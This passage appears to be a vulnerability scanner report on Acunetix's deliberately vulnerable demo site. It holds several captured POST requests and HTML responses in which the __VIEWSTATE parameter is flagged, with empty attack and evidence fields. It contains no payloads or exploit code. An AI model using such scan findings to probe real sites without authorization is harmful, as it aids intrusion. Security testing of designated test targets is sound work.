Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8228&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAw3aZY9oIZGRkdeoBDIcMNgl46BMlNtESG%2FEBmcM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLFk8OMAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bjd%2F6t5EgfKBvYaL1n15rQ2EGBDA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:51 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAw3aZY9oIZGRkdeoBDIcMNgl46BMlNtESG/EBmcM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLFk8OMAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+jd/6t5EgfKBvYaL1n15rQ2EGBDA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:White" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8216&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAznkrWtoIZGRkoKZG%2FeyrkwB08JykSWws3OY%2Fqh8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdsdn7CwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ81TP4dyTM%2FWYYBvxkkPXIbDPBmgA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAznkrWtoIZGRkoKZG/eyrkwB08JykSWws3OY/qh8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdsdn7CwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q81TP4dyTM/WYYBvxkkPXIbDPBmgA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:White" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
